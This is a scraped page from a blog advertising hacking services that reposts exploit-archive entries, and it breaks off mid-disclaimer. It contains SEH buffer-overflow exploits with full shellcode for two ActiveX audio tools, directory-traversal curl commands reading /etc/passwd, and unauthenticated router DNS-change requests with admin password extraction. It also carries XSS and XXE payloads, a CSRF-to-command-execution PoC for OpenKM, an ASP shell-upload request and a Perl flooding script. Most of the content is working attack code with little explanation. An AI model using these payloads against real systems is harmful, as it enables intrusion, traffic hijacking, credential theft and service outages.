Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863147334

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
<html>
<br>1 Click Audio Converter Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1GmOAyq -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xD7\x51\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1SYwV3u -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\xff\xff";
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No reponse from the vendor. Advisory released.


Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. 


Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.


Web Server Proof-of-Concept
===========================
Read arbitrary files/folders:
    Read /etc/passwd:
        curl "http://[TARGET IP]/../../../../../../../../etc/passwd"
    List contents of the /tmp directory:
        curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:
    Create the folder, "/tmp/PoC-Folder":
        curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"
    
Delete Files/Folders:
    Delete the folder, "/tmp/PoC-Folder":
        curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'
                                  
Upload a File:
    Upload /etc/services to /tmp/example.txt:
        curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

    
SMB Server Proof-of-Concept
===========================
Denial of Service:
    smbclient -N -c 'dir \' //[TARGET IP]/IPC$
    
Browse the iPhone's Filesystem:
    smbclient -N //[TARGET IP]/IPC$
HireHackking 
  Broadlight Residential Gateway DI3124 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  ShodanHQ Dork:
  Server: thttpd/2.25b 29dec2003 Content-Length: 348414


[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?"
{"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"},
{"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)'
<username>admin</username>
<password>admin</password>
HireHackking 
source: https://www.securityfocus.com/bid/53585/info

The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. 

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2
HireHackking 
source: https://www.securityfocus.com/bid/53598/info

PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHP Address Book 7.0 is vulnerable; other versions may also be affected. 

http://www.example.com/addressbookv7.0.0/group.php/[XSS]

http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateApplication>
         <urn:in0>
            <aut:credential>
               <aut:credential>stuff1</aut:credential>
               <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
            </aut:credential>
            <aut:name>stuff3</aut:name>
            <aut:validationFactors>
               <aut:ValidationFactor>
                  <aut:name>stuff4</aut:name>
                  <aut:value>stuff5</aut:value>
               </aut:ValidationFactor>
            </aut:validationFactors>
         </urn:in0>
      </urn:authenticateApplication>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53602/info

OpenKM is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application.

OpenKM 5.1.7 is vulnerable; other versions may also be affected. 

Login as administrator (having the AdminRole) and call the URL in a
different
browser window
http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3
D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%
2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
 
Alternatively the administrator could browse a prepared HTML page in a
new tab
<html>
<body>
<script>
img = new Image();
img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%
5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3
E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
</script>
</body>
</html>
 
The above exploit does nothing else than just creating a file in /tmp
 
String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);
 
Some might also want to browse directories
http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B
%0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%
3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++
+DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%
28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2
9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%
22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
HireHackking 
source: https://www.securityfocus.com/bid/53603/info

The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.

FishEye and Crucible versions up to and including 2.7.11 are vulnerable. 

Burp Repeater
Host: somehost.com
Port 443


POST /crowd/services/test HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 2420

<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:addAllPrincipals>
         <urn:in0>
            <!--Optional:-->
            <aut:name>?</aut:name>
            <!--Optional:-->
            <aut:token>?</aut:token>
         </urn:in0>
         <urn:in1>
            <!--Zero or more repetitions:-->
            <soap:
SOAPPrincipalWithCredential>
               <!--Optional:-->
               <soap:passwordCredential>
                  <!--Optional:-->
                  <aut:credential>?</aut:credential>
                  <!--Optional:-->
                  <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential>
               </soap:passwordCredential>
               <!--Optional:-->
               <soap:principal>
                  <!--Optional:-->
                  <soap:ID>?</soap:ID>
                  <!--Optional:-->
                  <soap:active>?</soap:active>
                  <!--Optional:-->
                  <soap:attributes>
                     <!--Zero or more repetitions:-->
                     <soap:SOAPAttribute>
                        <!--Optional:-->
                        <soap:name>?</soap:name>
                        <!--Optional:-->
                        <soap:values>
                           <!--Zero or more repetitions:-->
                           <urn:string>?</urn:string>
                        </soap:values>
                     </soap:SOAPAttribute>
                  </soap:attributes>
                  <!--Optional:-->
                  <soap:conception>?</soap:conception>
                  <!--Optional:-->
                  <soap:description>?</soap:description>
                  <!--Optional:-->
                  <soap:directoryId>?</soap:directoryId>
                  <!--Optional:-->
                  <soap:lastModified>?</soap:lastModified>
                  <!--Optional:-->
                  <soap:name>?</soap:name>
               </soap:principal>
            </soap:SOAPPrincipalWithCredential>
         </urn:in1>
      </urn:addAllPrincipals>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53616/info

Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.

Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--
HireHackking 
source: https://www.securityfocus.com/bid/53622/info

Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 

http://www.example.com/search/?text=%27);alert(document.cookie)//
HireHackking 
source: https://www.securityfocus.com/bid/53640/info

Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.

1. Multiple cross-site scripting vulnerabilities

2. An arbitrary-file-upload vulnerability

3. A denial-of-service vulnerability

An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 





Cross Site Scripting:

1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script>

2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625

3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>
3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>
www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script>

4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

4A)(without onmouseover event)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>

6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7
&fid=VALID_ID_OF_IAMGE

7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned

8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4

9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
&fid=VALID_ID_OF_IAMGE

10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned

11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=

11A)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID=

11B)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID=

11C)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script>

11D)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned
(All parameters goes to page source without any sanitization +validation)

12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1

13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>



Shell upload:

#### p0c 1 [ Upload File via FlashUploader ] ###==>

http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf

# Upload File/Shell Inj3ct0r.php;.gif




DOS:

#### p0c 2 [ DDos with RPC 'using simple PERL script]===>

#!/usr/bin/perl

use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<66; $i--)
{
$user="w00t".$rand.$i;
$data = "Aa"
;
$lenx = length $data;
$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $lenx\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$rpc", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /concrete/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};

# << ThE|End
HireHackking 
source: https://www.securityfocus.com/bid/53616/info
 
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
 
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.
 
Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 


http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../
HireHackking 
source: https://www.securityfocus.com/bid/53640/info
 
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
 
1. Multiple cross-site scripting vulnerabilities
 
2. An arbitrary-file-upload vulnerability
 
3. A denial-of-service vulnerability
 
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 
Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 


http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
HireHackking 
  D-Link DSL-2780B DLink_1.01.14 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
HireHackking 
  TP-Link ADSL2+ TD-W8950ND 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
